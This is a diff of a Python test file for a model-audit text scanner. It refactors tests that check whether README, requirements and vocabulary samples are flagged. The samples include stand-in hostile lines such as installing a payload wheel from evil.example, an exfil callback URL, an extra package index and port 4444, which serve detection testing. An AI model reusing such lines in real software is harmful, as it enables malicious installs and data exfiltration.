evil.example/tool@latest\n"), ("domain_name"), ("domain"), ("evil.example") ) - assert determine_exit_code(aggregate) == 1 @pytest.mark.parametrize( @@ -4082,27 +3227,14 @@ def test_text_scanner_go_install_domain_remains_actionable(tmp_path: Path) -> No ], ) def test_text_scanner_package_install_reference_urls_remain_informational(tmp_path: Path, content: str) -> None: - text_path = tmp_path / "README.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) - assert determine_exit_code(aggregate) == 0 + _assert_documentation_informational(tmp_path, content) def test_text_scanner_pip_general_option_prose_remains_informational(tmp_path: Path) -> None: - text_path = tmp_path / "README.md" - text_path.write_text( - "The pip --proxy option is documented at https://pip.pypa.io/en/stable/.\n", - encoding="utf-8", + _assert_documentation_scan_informational( + tmp_path, "The pip --proxy option is documented at https://pip.pypa.io/en/stable/.\n" ) - result = TextScanner().scan(str(text_path)) - - assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) - @pytest.mark.parametrize( "content", @@ -4112,34 +3244,15 @@ def test_text_scanner_pip_general_option_prose_remains_informational(tmp_path: P ], ) def test_text_scanner_pip_option_operands_are_not_commands(tmp_path: Path, content: str) -> None: - text_path = tmp_path / "README.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) - assert determine_exit_code(aggregate) == 0 + _assert_documentation_informational(tmp_path, content) def test_text_scanner_package_install_comment_url_is_informational(tmp_path: Path) -> None: - text_path = tmp_path / "README.md" - text_path.write_text("pip install modelaudit # docs: https://pip.pypa.io/en/stable/\n", encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) - assert determine_exit_code(aggregate) == 0 + _assert_documentation_informational(tmp_path, "pip install modelaudit # docs: https://pip.pypa.io/en/stable/\n") def test_text_scanner_package_install_url_before_comment_remains_actionable(tmp_path: Path) -> None: - text_path = tmp_path / "README.md" - text_path.write_text("pip install https://evil.example/payload.whl # pinned artifact\n", encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - - assert any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) + _assert_documentation_scan_actionable(tmp_path, "pip install https://evil.example/payload.whl # pinned artifact\n") @pytest.mark.parametrize( @@ -4156,19 +3269,7 @@ def test_text_scanner_continued_documentation_download_url_remains_actionable( tmp_path: Path, content: str, ) -> None: - text_path = tmp_path / "README.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert any( - check.name == "Network Communication Detection" - and check.details.get("type") == "url_detected" - and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} - for check in result.checks - ) - assert determine_exit_code(aggregate) == 1 + _assert_documentation_network_actionable(tmp_path, content, "url_detected") @pytest.mark.parametrize( @@ -4179,12 +3280,7 @@ def test_text_scanner_continued_documentation_download_url_remains_actionable( ], ) def test_text_scanner_prose_backslash_does_not_make_next_url_actionable(tmp_path: Path, content: str) -> None: - text_path = tmp_path / "README.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - - assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) + _assert_documentation_scan_informational(tmp_path, content) @pytest.mark.parametrize( @@ -4195,27 +3291,13 @@ def test_text_scanner_prose_backslash_does_not_make_next_url_actionable(tmp_path ], ) def test_text_scanner_continued_shell_comment_url_is_informational(tmp_path: Path, content: str) -> None: - text_path = tmp_path / "README.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - - assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) + _assert_documentation_scan_informational(tmp_path, content) def test_text_scanner_indirect_network_api_call_remains_actionable(tmp_path: Path) -> None: - text_path = tmp_path / "README.md" - text_path.write_text("executor.submit(requests.get, endpoint)\n", encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - - assert any( - check.name == "Network Communication Detection" - and check.details.get("type") == "network_function" - and check.details.get("function") == "requests.get" - and check.severity == IssueSeverity.CRITICAL - for check in result.checks - ) + _assert_indirect_network_call( + tmp_path, ("executor.submit(requests.get, endpoint)\n"), ("network_function"), ("function"), ("requests.get") + ) @pytest.mark.parametrize( @@ -4230,19 +3312,7 @@ def test_text_scanner_indirect_network_api_call_remains_actionable(tmp_path: Pat ], ) def test_text_scanner_documentation_code_url_argument_remains_actionable(tmp_path: Path, content: str) -> None: - text_path = tmp_path / "README.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert any( - check.name == "Network Communication Detection" - and check.details.get("type") == "url_detected" - and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} - for check in result.checks - ) - assert determine_exit_code(aggregate) == 1 + _assert_documentation_network_actionable(tmp_path, content, "url_detected") @pytest.mark.parametrize( @@ -4253,19 +3323,7 @@ def test_text_scanner_documentation_code_url_argument_remains_actionable(tmp_pat ], ) def test_text_scanner_documentation_lambda_url_remains_actionable(tmp_path: Path, content: str) -> None: - text_path = tmp_path / "README.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert any( - check.name == "Network Communication Detection" - and check.details.get("type") == "url_detected" - and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} - for check in result.checks - ) - assert determine_exit_code(aggregate) == 1 + _assert_documentation_network_actionable(tmp_path, content, "url_detected") @pytest.mark.parametrize( @@ -4280,19 +3338,7 @@ def test_text_scanner_documentation_security_endpoint_label_remains_actionable( tmp_path: Path, content: str, ) -> None: - text_path = tmp_path / "README.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert any( - check.name == "Network Communication Detection" - and check.details.get("type") == "url_detected" - and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} - for check in result.checks - ) - assert determine_exit_code(aggregate) == 1 + _assert_documentation_network_actionable(tmp_path, content, "url_detected") @pytest.mark.parametrize( @@ -4309,14 +3355,7 @@ def test_text_scanner_documentation_code_like_prose_links_remain_informational( tmp_path: Path, content: str, ) -> None: - text_path = tmp_path / "README.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) - assert determine_exit_code(aggregate) == 0 + _assert_documentation_informational(tmp_path, content) @pytest.mark.parametrize( @@ -4348,9 +3387,7 @@ def test_text_scanner_documentation_code_like_prose_links_remain_informational( ) def test_text_scanner_documentation_endpoint_config_remains_actionable(tmp_path: Path, content: str) -> None: text_path = tmp_path / "README.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) + result = _scan_text_content(text_path, content) assert any( check.name == "Network Communication Detection" @@ -4361,19 +3398,9 @@ def test_text_scanner_documentation_endpoint_config_remains_actionable(tmp_path: def test_text_scanner_real_lambda_url_expression_remains_actionable(tmp_path: Path) -> None: - text_path = tmp_path / "README.md" - text_path.write_text('lambda target: "https://evil.example/payload"\n', encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert any( - check.name == "Network Communication Detection" - and check.details.get("type") == "url_detected" - and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} - for check in result.checks + _assert_documentation_network_actionable( + tmp_path, 'lambda target: "https://evil.example/payload"\n', "url_detected" ) - assert determine_exit_code(aggregate) == 1 @pytest.mark.parametrize("padding", [" ", " " * 300]) @@ -4381,73 +3408,32 @@ def test_text_scanner_parenthesized_documentation_assignment_remains_actionable( tmp_path: Path, padding: str, ) -> None: - text_path = tmp_path / "README.md" - text_path.write_text(f'endpoint = (\n{padding}"https://evil.example/payload"\n)\n', encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert any( - check.name == "Network Communication Detection" - and check.details.get("type") == "url_detected" - and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} - for check in result.checks + _assert_documentation_network_actionable( + tmp_path, f'endpoint = (\n{padding}"https://evil.example/payload"\n)\n', "url_detected" ) - assert determine_exit_code(aggregate) == 1 def test_text_scanner_generic_quoted_url_mapping_remains_informational(tmp_path: Path) -> None: - text_path = tmp_path / "README.md" - text_path.write_text('{"project_url": "https://example.com/project"}\n', encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) - assert determine_exit_code(aggregate) == 0 + _assert_documentation_informational(tmp_path, '{"project_url": "https://example.com/project"}\n') def test_text_scanner_generic_url_collection_mapping_remains_informational(tmp_path: Path) -> None: - text_path = tmp_path / "README.md" - text_path.write_text("project_urls:\n - https://example.com/project\n", encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) - assert determine_exit_code(aggregate) == 0 + _assert_documentation_informational(tmp_path, "project_urls:\n - https://example.com/project\n") def test_text_scanner_generic_nested_url_mapping_remains_informational(tmp_path: Path) -> None: - text_path = tmp_path / "README.md" - text_path.write_text('{"project": {"url": "https://example.com/project"}}\n', encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) - assert determine_exit_code(aggregate) == 0 + _assert_documentation_informational(tmp_path, '{"project": {"url": "https://example.com/project"}}\n') def test_text_scanner_unrelated_endpoint_does_not_taint_nested_project_url(tmp_path: Path) -> None: - text_path = tmp_path / "README.md" - text_path.write_text( - "endpoint:\n name: inference\nproject:\n url: https://example.com/project\n", - encoding="utf-8", + _assert_documentation_informational( + tmp_path, "endpoint:\n name: inference\nproject:\n url: https://example.com/project\n" ) - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) - assert determine_exit_code(aggregate) == 0 - def test_text_scanner_backslash_continued_network_call_remains_actionable(tmp_path: Path) -> None: text_path = tmp_path / "README.md" - text_path.write_text('requests.get\\\n ("https://evil.example/payload")\n', encoding="utf-8") - - result = TextScanner().scan(str(text_path)) + result = _scan_text_content(text_path, 'requests.get\\\n ("https://evil.example/payload")\n') assert any( check.name == "Network Communication Detection" @@ -4458,12 +3444,7 @@ def test_text_scanner_backslash_continued_network_call_remains_actionable(tmp_pa def test_text_scanner_backslash_continued_network_prose_remains_informational(tmp_path: Path) -> None: - text_path = tmp_path / "README.md" - text_path.write_text("requests.get\\\n is described in the API reference.\n", encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - - assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) + _assert_documentation_scan_informational(tmp_path, "requests.get\\\n is described in the API reference.\n") @pytest.mark.parametrize( @@ -4477,12 +3458,7 @@ def test_text_scanner_backslash_continued_network_prose_remains_informational(tm ], ) def test_text_scanner_documentation_prose_markers_remain_informational(tmp_path: Path, content: str) -> None: - text_path = tmp_path / "README.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - - assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) + _assert_documentation_scan_informational(tmp_path, content) def test_text_scanner_routes_rst_documentation_sidecars(tmp_path: Path) -> None: @@ -4502,17 +3478,15 @@ def test_text_scanner_routes_rst_documentation_sidecars(tmp_path: Path) -> None: def test_text_scanner_documentation_benign_cc_prose_is_informational(tmp_path: Path) -> None: text_path = tmp_path / "README.md" - text_path.write_text( + result = _scan_text_content( + text_path, "This model is not malware.\n" "Backdoor robustness benchmark.\n" "This model has no backdoors.\n" "Without botnets.\n" "Potential backdoor indicators are reported without executing the model.\n", - encoding="utf-8", ) - result = TextScanner().scan(str(text_path)) - cc_checks = [ check for check in result.checks @@ -4524,40 +3498,20 @@ def test_text_scanner_documentation_benign_cc_prose_is_informational(tmp_path: P def test_text_scanner_backdoor_indicator_assignment_remains_actionable(tmp_path: Path) -> None: - text_path = tmp_path / "README.md" - text_path.write_text('status = "backdoor indicators"\n', encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - - assert any( - check.name == "Network Communication Detection" - and check.details.get("type") == "cc_pattern" - and check.details.get("pattern") == "backdoor" - and check.severity == IssueSeverity.CRITICAL - for check in result.checks + _assert_indirect_network_call( + tmp_path, ('status = "backdoor indicators"\n'), ("cc_pattern"), ("pattern"), ("backdoor") ) def test_text_scanner_documentation_cc_admission_remains_actionable(tmp_path: Path) -> None: - text_path = tmp_path / "README.md" - text_path.write_text("This model contains a backdoor payload.\n", encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - - assert any( - check.name == "Network Communication Detection" - and check.details.get("type") == "cc_pattern" - and check.details.get("pattern") == "backdoor" - and check.severity == IssueSeverity.CRITICAL - for check in result.checks + _assert_indirect_network_call( + tmp_path, ("This model contains a backdoor payload.\n"), ("cc_pattern"), ("pattern"), ("backdoor") ) def test_text_scanner_plural_cc_admission_remains_actionable(tmp_path: Path) -> None: text_path = tmp_path / "README.md" - text_path.write_text("This model installs backdoors and botnets.\n", encoding="utf-8") - - result = TextScanner().scan(str(text_path)) + result = _scan_text_content(text_path, "This model installs backdoors and botnets.\n") assert any( check.name == "Network Communication Detection" @@ -4570,9 +3524,7 @@ def test_text_scanner_plural_cc_admission_remains_actionable(tmp_path: Path) -> def test_text_scanner_benign_cc_phrase_does_not_hide_separate_admission(tmp_path: Path) -> None: text_path = tmp_path / "README.md" - text_path.write_text("Malware detection bypass installs a backdoor payload.\n", encoding="utf-8") - - result = TextScanner().scan(str(text_path)) + result = _scan_text_content(text_path, "Malware detection bypass installs a backdoor payload.\n") aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) cc_checks = { @@ -4586,39 +3538,27 @@ def test_text_scanner_benign_cc_phrase_does_not_hide_separate_admission(tmp_path def test_text_scanner_later_cc_admission_is_not_hidden_by_benign_prose(tmp_path: Path) -> None: - text_path = tmp_path / "README.md" - text_path.write_text( - "Backdoor robustness benchmark.\nThis artifact installs a backdoor payload.\n", - encoding="utf-8", - ) - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert any( - check.name == "Network Communication Detection" - and check.details.get("type") == "cc_pattern" - and check.details.get("pattern") == "backdoor" - and check.severity == IssueSeverity.CRITICAL - for check in result.checks + _assert_nested_network_call( + tmp_path, + ("Backdoor robustness benchmark.\nThis artifact installs a backdoor payload.\n"), + ("cc_pattern"), + ("pattern"), + ("backdoor"), ) - assert determine_exit_code(aggregate) == 1 def test_text_scanner_documentation_placeholder_secrets_are_ignored(tmp_path: Path) -> None: text_path = tmp_path / "README.md" - text_path.write_text( + result = _scan_text_content( + text_path, "client_secret = YOUR_CLIENT_SECRET\n" "secret = \n" "client_secret = clientSecretValue\n" "client_secret = clientsecretvalue\n" "password = examplepassword\n" "secret = \n", - encoding="utf-8", ) - result = TextScanner().scan(str(text_path)) - assert not any( check.name == "Embedded Secrets Detection" and check.status == CheckStatus.FAILED for check in result.checks ) @@ -4626,9 +3566,7 @@ def test_text_scanner_documentation_placeholder_secrets_are_ignored(tmp_path: Pa def test_text_scanner_documentation_cc_markers_remain_actionable(tmp_path: Path) -> None: text_path = tmp_path / "README.md" - text_path.write_text("callback_url=https://evil.example/exfil\n", encoding="utf-8") - - result = TextScanner().scan(str(text_path)) + result = _scan_text_content(text_path, "callback_url=https://evil.example/exfil\n") assert any( check.name == "Network Communication Detection" @@ -4648,9 +3586,7 @@ def test_text_scanner_documentation_cc_markers_remain_actionable(tmp_path: Path) ) def test_text_scanner_documentation_port_prose_is_informational(tmp_path: Path, content: str) -> None: text_path = tmp_path / "README.md" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) + result = _scan_text_content(text_path, content) aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) port_checks = [ @@ -4664,42 +3600,16 @@ def test_text_scanner_documentation_port_prose_is_informational(tmp_path: Path, def test_text_scanner_documentation_port_assignment_remains_actionable(tmp_path: Path) -> None: - text_path = tmp_path / "README.md" - text_path.write_text("PORT=4444\n", encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert any( - check.name == "Network Communication Detection" - and check.details.get("type") == "suspicious_port" - and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} - for check in result.checks - ) - assert determine_exit_code(aggregate) == 1 + _assert_documentation_network_actionable(tmp_path, "PORT=4444\n", "suspicious_port") def test_text_scanner_later_port_assignment_is_not_hidden_by_prose(tmp_path: Path) -> None: - text_path = tmp_path / "README.md" - text_path.write_text("SSH uses port 22.\nport=22\n", encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert any( - check.name == "Network Communication Detection" - and check.details.get("type") == "suspicious_port" - and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} - for check in result.checks - ) - assert determine_exit_code(aggregate) == 1 + _assert_documentation_network_actionable(tmp_path, "SSH uses port 22.\nport=22\n", "suspicious_port") def test_text_scanner_requirements_urls_remain_actionable(tmp_path: Path) -> None: text_path = tmp_path / "requirements.txt" - text_path.write_text("--extra-index-url https://evil.example/simple\nsafe-package==1.0\n", encoding="utf-8") - - result = TextScanner().scan(str(text_path)) + result = _scan_text_content(text_path, "--extra-index-url https://evil.example/simple\nsafe-package==1.0\n") aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) assert any( @@ -4784,18 +3694,7 @@ def test_text_scanner_credentialed_standard_requirements_urls_remain_actionable( tmp_path: Path, requirement_line: str, ) -> None: - text_path = tmp_path / "requirements.txt" - text_path.write_text(f"{requirement_line}\n", encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert any( - check.name == "Network Communication Detection" - and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} - for check in result.checks - ) - assert determine_exit_code(aggregate) == 1 + _assert_requirements_actionable(tmp_path, requirement_line) @pytest.mark.parametrize( @@ -4834,18 +3733,7 @@ def test_text_scanner_insecure_standard_requirements_url_remains_actionable( tmp_path: Path, requirement_line: str, ) -> None: - text_path = tmp_path / "requirements.txt" - text_path.write_text(f"{requirement_line}\n", encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) - - assert any( - check.name == "Network Communication Detection" - and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} - for check in result.checks - ) - assert determine_exit_code(aggregate) == 1 + _assert_requirements_actionable(tmp_path, requirement_line) def _bert_like_multilingual_vocabulary(*tail_tokens: str) -> str: @@ -4934,9 +3822,7 @@ def test_text_scanner_multilingual_tokenizer_vocab_active_context_remains_action def test_text_scanner_bare_vocabulary_urls_are_informational(tmp_path: Path) -> None: text_path = tmp_path / "vocab.txt" - text_path.write_text("safe-token\nhttps://docs.example.com/reference\n", encoding="utf-8") - - result = TextScanner().scan(str(text_path)) + result = _scan_text_content(text_path, "safe-token\nhttps://docs.example.com/reference\n") network_checks = [ check @@ -5099,9 +3985,7 @@ def test_text_scanner_merges_basic_assignments_remain_actionable(tmp_path: Path) text_dir = tmp_path / "text_tokenizer" text_dir.mkdir() text_path = text_dir / "merges.txt" - text_path.write_text("authorization=Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==\n", encoding="utf-8") - - result = TextScanner().scan(str(text_path)) + result = _scan_text_content(text_path, "authorization=Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==\n") aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) assert any( @@ -5285,9 +4169,7 @@ def test_text_scanner_tokenizer_vocab_line_separators_omit_suffix_marked_cc_toke def test_text_scanner_ambiguous_short_vocab_does_not_suppress_cc_pattern(tmp_path: Path) -> None: text_path = tmp_path / "vocab.txt" - text_path.write_text("safe-token\ntrojan\n", encoding="utf-8") - - result = TextScanner().scan(str(text_path)) + result = _scan_text_content(text_path, "safe-token\ntrojan\n") assert any( check.name == "Network Communication Detection" @@ -5343,17 +4225,8 @@ def test_text_scanner_tokenizer_vocab_urls_remain_detected(tmp_path: Path) -> No def test_text_scanner_non_vocabulary_trojan_prose_remains_actionable(tmp_path: Path) -> None: - text_path = tmp_path / "README.md" - text_path.write_text("This model installs a trojan payload.\n", encoding="utf-8") - - result = TextScanner().scan(str(text_path)) - - assert any( - check.name == "Network Communication Detection" - and check.details.get("type") == "cc_pattern" - and check.details.get("pattern") == "trojan" - and check.severity == IssueSeverity.CRITICAL - for check in result.checks + _assert_indirect_network_call( + tmp_path, ("This model installs a trojan payload.\n"), ("cc_pattern"), ("pattern"), ("trojan") ) @@ -5370,9 +4243,7 @@ def test_text_scanner_active_vocabulary_context_remains_actionable( finding_type: str, ) -> None: text_path = tmp_path / "vocab.txt" - text_path.write_text(content, encoding="utf-8") - - result = TextScanner().scan(str(text_path)) + result = _scan_text_content(text_path, content) aggregate = scan_model_directory_or_file(str(text_path), cache_enabled=False) assert any( @@ -5385,40 +4256,18 @@ def test_text_scanner_active_vocabulary_context_remains_actionable( def test_text_scanner_vocabulary_url_assignments_remain_actionable(tmp_path: Path) -> None: - text_path = tmp_path / "tokens.txt" - text_path.write_text("endpoint=https://evil.example/payload\n", encoding="utf-8") + _assert_vocabulary_endpoint(tmp_path, ("tokens.txt")) - result = TextScanner().scan(str(text_path)) - assert any( - check.name == "Network Communication Detection" - and check.status == CheckStatus.FAILED - and check.details.get("type") == "url_detected" - and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} - for check in result.checks - ) +def test_text_scanner_markdown_vocabulary_url_assignments_remain_actionable(tmp_path: Path) -> None: + _assert_vocabulary_endpoint(tmp_path, ("tokens.md")) -def test_text_scanner_markdown_vocabulary_url_assignments_remain_actionable(tmp_path: Path) -> None: - text_path = tmp_path / "tokens.md" - text_path.write_text("endpoint=https://evil.example/payload\n", encoding="utf-8") +def test_text_scanner_disabled_detectors_do_not_report_clean_coverage(tmp_path: Path) -> None: + text_path = tmp_path / "vocab.txt" + text_path.write_text("token\n", encoding="utf-8") - result = TextScanner().scan(str(text_path)) - - assert any( - check.name == "Network Communication Detection" - and check.status == CheckStatus.FAILED - and check.details.get("type") == "url_detected" - and check.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} - for check in result.checks - ) - - -def test_text_scanner_disabled_detectors_do_not_report_clean_coverage(tmp_path: Path) -> None: - text_path = tmp_path / "vocab.txt" - text_path.write_text("token\n", encoding="utf-8") - - result = TextScanner(config={"check_secrets": False, "check_network_comm": False}).scan(str(text_path)) + result = TextScanner(config={"check_secrets": False, "check_network_comm": False}).scan(str(text_path)) assert result.metadata["disabled_checks"] == [ "Embedded Secrets Detection", @@ -5675,63 +4524,15 @@ def test_text_scanner_documentation_endpoint_redaction_limit_with_code_fails_clo tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - monkeypatch.setattr(network_comm, "_redact_network_evidence", lambda text: text) - text_path = tmp_path / "README.md" - text_path.write_text( - "api_key references below are documentation-only.\n" - + "\n".join(f"Reference {index}: https://cdn.openai.com/papers/{index}.pdf" for index in range(40)) - + '\ndownload("https://evil.example/payload.sh")\n', - encoding="utf-8", - ) - - result = TextScanner(config={"check_secrets": False}).scan(str(text_path)) - aggregate = scan_model_directory_or_file( - str(text_path), - config={"check_secrets": False}, - cache_enabled=False, - ) - - assert result.success is False - assert result.metadata.get("scan_outcome") == INCONCLUSIVE_SCAN_OUTCOME - assert result.metadata.get("operational_error_reason") == "text_content_security_finding_limit" - assert determine_exit_code(aggregate) == 2 - assert any( - check.name == "Text Content Security Coverage" - and check.details.get("truncated_finding_type") == "endpoint_redaction_classification" - and check.details.get("scan_outcome_reason") == "text_content_security_finding_limit" - for check in result.checks - ) + _assert_endpoint_redaction_limit(tmp_path, monkeypatch, ('\ndownload("https://evil.example/payload.sh")\n')) def test_text_scanner_documentation_endpoint_redaction_limit_with_wrapped_call_fails_closed( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - monkeypatch.setattr(network_comm, "_redact_network_evidence", lambda text: text) - text_path = tmp_path / "README.md" - text_path.write_text( - "api_key references below are documentation-only.\n" - + "\n".join(f"Reference {index}: https://cdn.openai.com/papers/{index}.pdf" for index in range(40)) - + '\ndownload(\n "[download](https://evil.example/payload.sh)"\n)\n', - encoding="utf-8", - ) - - result = TextScanner(config={"check_secrets": False}).scan(str(text_path)) - aggregate = scan_model_directory_or_file( - str(text_path), - config={"check_secrets": False}, - cache_enabled=False, - ) - - assert result.success is False - assert result.metadata.get("scan_outcome") == INCONCLUSIVE_SCAN_OUTCOME - assert result.metadata.get("operational_error_reason") == "text_content_security_finding_limit" - assert determine_exit_code(aggregate) == 2 - assert any( - check.name == "Text Content Security Coverage" - and check.details.get("truncated_finding_type") == "endpoint_redaction_classification" - and check.details.get("scan_outcome_reason") == "text_content_security_finding_limit" - for check in result.checks + _assert_endpoint_redaction_limit( + tmp_path, monkeypatch, ('\ndownload(\n "[download](https://evil.example/payload.sh)"\n)\n') ) @@ -5739,31 +4540,8 @@ def test_text_scanner_documentation_endpoint_redaction_limit_with_multiline_dict tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - monkeypatch.setattr(network_comm, "_redact_network_evidence", lambda text: text) - text_path = tmp_path / "README.md" - text_path.write_text( - "api_key references below are documentation-only.\n" - + "\n".join(f"Reference {index}: https://cdn.openai.com/papers/{index}.pdf" for index in range(40)) - + '\npayloads = {\n "doc": "[download](https://evil.example/payload.sh)"\n}\n', - encoding="utf-8", - ) - - result = TextScanner(config={"check_secrets": False}).scan(str(text_path)) - aggregate = scan_model_directory_or_file( - str(text_path), - config={"check_secrets": False}, - cache_enabled=False, - ) - - assert result.success is False - assert result.metadata.get("scan_outcome") == INCONCLUSIVE_SCAN_OUTCOME - assert result.metadata.get("operational_error_reason") == "text_content_security_finding_limit" - assert determine_exit_code(aggregate) == 2 - assert any( - check.name == "Text Content Security Coverage" - and check.details.get("truncated_finding_type") == "endpoint_redaction_classification" - and check.details.get("scan_outcome_reason") == "text_content_security_finding_limit" - for check in result.checks + _assert_endpoint_redaction_limit( + tmp_path, monkeypatch, ('\npayloads = {\n "doc": "[download](https://evil.example/payload.sh)"\n}\n') ) @@ -5771,127 +4549,29 @@ def test_text_scanner_documentation_endpoint_redaction_limit_with_actionable_fin tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - monkeypatch.setattr(network_comm, "_redact_network_evidence", lambda text: text) - text_path = tmp_path / "README.md" - text_path.write_text( - "api_key references below are documentation-only.\n" - + "\n".join(f"Reference {index}: https://cdn.openai.com/papers/{index}.pdf" for index in range(40)) - + "\nAPI_URL = load_endpoint()\nrequests.get(API_URL)\n", - encoding="utf-8", - ) - - result = TextScanner(config={"check_secrets": False}).scan(str(text_path)) - aggregate = scan_model_directory_or_file( - str(text_path), - config={"check_secrets": False}, - cache_enabled=False, - ) - - assert result.success is False - assert result.metadata.get("scan_outcome") == INCONCLUSIVE_SCAN_OUTCOME - assert result.metadata.get("operational_error_reason") == "text_content_security_finding_limit" - assert determine_exit_code(aggregate) == 2 - assert any( - check.name == "Text Content Security Coverage" - and check.details.get("truncated_finding_type") == "endpoint_redaction_classification" - and check.details.get("scan_outcome_reason") == "text_content_security_finding_limit" - for check in result.checks - ) + _assert_endpoint_redaction_limit(tmp_path, monkeypatch, ("\nAPI_URL = load_endpoint()\nrequests.get(API_URL)\n")) def test_text_scanner_documentation_endpoint_redaction_limit_with_nested_config_fails_closed( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - monkeypatch.setattr(network_comm, "_redact_network_evidence", lambda text: text) - text_path = tmp_path / "README.md" - text_path.write_text( - "api_key references below are documentation-only.\n" - + "\n".join(f"Reference {index}: https://cdn.openai.com/papers/{index}.pdf" for index in range(40)) - + "\nendpoint:\n url: https://evil.example/payload.sh\n", - encoding="utf-8", - ) - - result = TextScanner(config={"check_secrets": False}).scan(str(text_path)) - aggregate = scan_model_directory_or_file( - str(text_path), - config={"check_secrets": False}, - cache_enabled=False, - ) - - assert result.success is False - assert result.metadata.get("scan_outcome") == INCONCLUSIVE_SCAN_OUTCOME - assert result.metadata.get("operational_error_reason") == "text_content_security_finding_limit" - assert determine_exit_code(aggregate) == 2 - assert any( - check.name == "Text 